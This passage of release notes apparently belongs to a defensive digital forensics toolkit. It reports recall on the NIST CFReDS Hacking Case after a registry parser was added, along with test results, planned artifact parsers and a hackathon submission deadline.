| 3 | NIST CFReDS Hacking Case | 0.50 strict / 0.80 lenient |
- 🚀 5× CFReDS recall jump from v0.5.3 (0.10 / 0.40) after `parse_registry_hive` shipped: unlocked 4 findings at once (closes #52)
- ✅ 43/43 tests pass on Python 3.10/3.11/3.12/3.13 matrix
- 📦 61 MCP tools (36 native + 25 SIFT adapters), all read-only
Why this matters
Synthetic recall=1.000 by itself looks too good to be true. v0.5.4 lets us state honestly that external benchmark recall is 0.50/0.80, and trace the remaining gap to specific paradigm differences — turning "registry parsing is on the wishlist" into "registry parsing unlocks 4 measured findings, ship next."
What's next (Phase 2)
- #53 IE6 `index.dat` parser
- #54 Recycle Bin `INFO2` parser
- #55 Bundled YARA rule library
- #47 Additional external datasets (Ali Hadi, DFRWS, BOTS)
Reference
- Submission target: SANS FIND EVIL! 2026 (findevil.devpost.com)
- Deadline: 2026-06-15 23:45 EDT (JST 2026-06-16 12:45 PM)
- Accuracy methodology: docs/accuracy-report.md